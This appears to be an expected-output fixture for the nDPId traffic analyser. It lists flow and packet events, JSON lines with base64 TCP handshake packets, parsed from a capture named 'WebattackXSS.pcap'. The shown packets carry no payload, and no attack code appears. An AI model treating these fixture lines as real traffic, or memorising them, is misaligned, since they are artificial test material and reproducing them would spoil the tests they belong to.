+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3464,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347384186,"flow_last_seen":1499347384186,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347384186,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56616,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3464,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":244,"flow_packet_id":1,"flow_last_seen":1499347384186,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347384186,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8bHdAAD4GWVmsEAABwKgKMt0oAFALKxLdAAAAAKACchDjngAAAgQFtAQCCAoBOn6qAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3465,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":244,"flow_packet_id":2,"flow_last_seen":1499347384186,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347384186,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3Sg6aAAMCysS3qAScSBWBQAAAgQFtAQCCAoD5FAgATp+qgEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3466,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":244,"flow_packet_id":3,"flow_last_seen":1499347384187,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347384187,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0bHhAAD4GWWCsEAABwKgKMt0oAFALKxLeOmgADYAQAOX1DAAAAQEICgE6fqoD5FAg"} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3473,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":166,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347252179,"flow_last_seen":1499347257688,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347384721,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55212,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3473,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":166,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347252179,"flow_last_seen":1499347257688,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347384721,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55212,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3473,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347253445,"flow_last_seen":1499347258688,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347384721,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55226,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3473,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347253445,"flow_last_seen":1499347258688,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347384721,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55226,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3473,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":168,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347254714,"flow_last_seen":1499347260689,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347384721,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55240,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3473,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":168,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347254714,"flow_last_seen":1499347260689,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347384721,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55240,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3473,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":169,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347257224,"flow_last_seen":1499347262689,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347384721,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55266,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3473,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":169,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347257224,"flow_last_seen":1499347262689,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347384721,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55266,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3473,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":170,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347258474,"flow_last_seen":1499347263689,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347384721,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55280,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3473,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":170,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347258474,"flow_last_seen":1499347263689,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347384721,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55280,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3476,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":245,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347385481,"flow_last_seen":1499347385481,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347385481,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56630,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3476,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":245,"flow_packet_id":1,"flow_last_seen":1499347385481,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347385481,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8VSxAAD4GcKSsEAABwKgKMt02AFBQ3SrBAAAAAKACchCEtwAAAgQFtAQCCAoBOn\/tAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3477,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":245,"flow_packet_id":2,"flow_last_seen":1499347385481,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347385481,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3TZsZa1KUN0qwqAScSAWnwAAAgQFtAQCCAoD5FFjATp\/7QEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3478,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":245,"flow_packet_id":3,"flow_last_seen":1499347385481,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347385481,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0VS1AAD4GcKusEAABwKgKMt02AFBQ3SrCbGWtS4AQAOW1pQAAAQEICgE6f+4D5FFj"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3492,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":246,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347386736,"flow_last_seen":1499347386736,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347386736,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56644,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3492,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":246,"flow_packet_id":1,"flow_last_seen":1499347386736,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347386736,"pkt":"ABm5CmnxAMGxFOsxCABFAAA85qBAAD4G3y+sEAABwKgKMt1EAFDnQGeHAAAAAKACchCwRQAAAgQFtAQCCAoBOoEnAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3493,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":246,"flow_packet_id":2,"flow_last_seen":1499347386736,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347386736,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3URBkoPY50BniKAScSCVOAAAAgQFtAQCCAoD5FKdATqBJwEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3494,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":246,"flow_packet_id":3,"flow_last_seen":1499347386737,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347386737,"pkt":"ABm5CmnxAMGxFOsxCABFAAA05qFAAD4G3zasEAABwKgKMt1EAFDnQGeIQZKD2YAQAOU0PwAAAQEICgE6gSgD5FKd"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3508,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":247,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347389305,"flow_last_seen":1499347389305,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347389305,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56670,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3508,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":247,"flow_packet_id":1,"flow_last_seen":1499347389305,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347389305,"pkt":"ABm5CmnxAMGxFOsxCABFAAA86AFAAD4G3c6sEAABwKgKMt1eAFBbbmurAAAAAKACchA1VwAAAgQFtAQCCAoBOoOqAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3509,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":247,"flow_packet_id":2,"flow_last_seen":1499347389305,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347389305,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3V4nyHcOW25rrKAScSA+XAAAAgQFtAQCCAoD5FUfATqDqgEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3510,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":247,"flow_packet_id":3,"flow_last_seen":1499347389306,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347389306,"pkt":"ABm5CmnxAMGxFOsxCABFAAA06AJAAD4G3dWsEAABwKgKMt1eAFBbbmusJ8h3D4AQAOXdYwAAAQEICgE6g6oD5FUf"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3520,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":248,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347390580,"flow_last_seen":1499347390580,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347390580,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56684,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3520,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":248,"flow_packet_id":1,"flow_last_seen":1499347390580,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347390580,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8jW9AAD4GOGGsEAABwKgKMt1sAFC4TAmHAAAAAKACchA5UQAAAgQFtAQCCAoBOoToAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3521,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":248,"flow_packet_id":2,"flow_last_seen":1499347390580,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347390580,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3Wzc2WIguEwJiKAScSCg8wAAAgQFtAQCCAoD5FZeATqE6AEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3522,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":248,"flow_packet_id":3,"flow_last_seen":1499347390581,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347390581,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0jXBAAD4GOGisEAABwKgKMt1sAFC4TAmI3NliIYAQAOU\/+gAAAQEICgE6hOkD5FZe"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3543,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":249,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347393135,"flow_last_seen":1499347393135,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347393135,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56710,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3543,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":249,"flow_packet_id":1,"flow_last_seen":1499347393135,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347393135,"pkt":"ABm5CmnxAMGxFOsxCABFAAA89hRAAD4Gz7usEAABwKgKMt2GAFBIK3FzAAAAAKACchA+7QAAAgQFtAQCCAoBOodnAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3544,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":249,"flow_packet_id":2,"flow_last_seen":1499347393135,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347393135,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3Yb1ZkzcSCtxdKAScSCgxwAAAgQFtAQCCAoD5FjdATqHZwEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3545,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":249,"flow_packet_id":3,"flow_last_seen":1499347393136,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347393136,"pkt":"ABm5CmnxAMGxFOsxCABFAAA09hVAAD4Gz8KsEAABwKgKMt2GAFBIK3F09WZM3YAQAOU\/zwAAAQEICgE6h2cD5Fjd"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3552,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":250,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347394398,"flow_last_seen":1499347394398,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347394398,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56724,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3552,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":250,"flow_packet_id":1,"flow_last_seen":1499347394398,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347394398,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8eldAAD4GS3msEAABwKgKMt2UAFCjvfL0AAAAAKACchBgjwAAAgQFtAQCCAoBOoijAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3553,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":250,"flow_packet_id":2,"flow_last_seen":1499347394398,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347394398,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3ZQ04Dogo73y9aAScSCUcAAAAgQFtAQCCAoD5FoZATqIowEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3554,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":250,"flow_packet_id":3,"flow_last_seen":1499347394399,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347394399,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0elhAAD4GS4CsEAABwKgKMt2UAFCjvfL1NOA6IYAQAOUzeAAAAQEICgE6iKMD5FoZ"} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3561,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347259759,"flow_last_seen":1499347265691,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347394723,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55294,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3561,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347259759,"flow_last_seen":1499347265691,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347394723,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55294,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3561,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":172,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347262289,"flow_last_seen":1499347267691,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347394723,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55320,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3561,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":172,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347262289,"flow_last_seen":1499347267691,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347394723,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55320,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3561,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":173,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347263542,"flow_last_seen":1499347268692,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347394723,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55334,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3561,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":173,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347263542,"flow_last_seen":1499347268692,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347394723,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55334,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3561,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":174,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347264804,"flow_last_seen":1499347270693,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347394723,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55348,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3561,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":174,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347264804,"flow_last_seen":1499347270693,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347394723,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55348,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 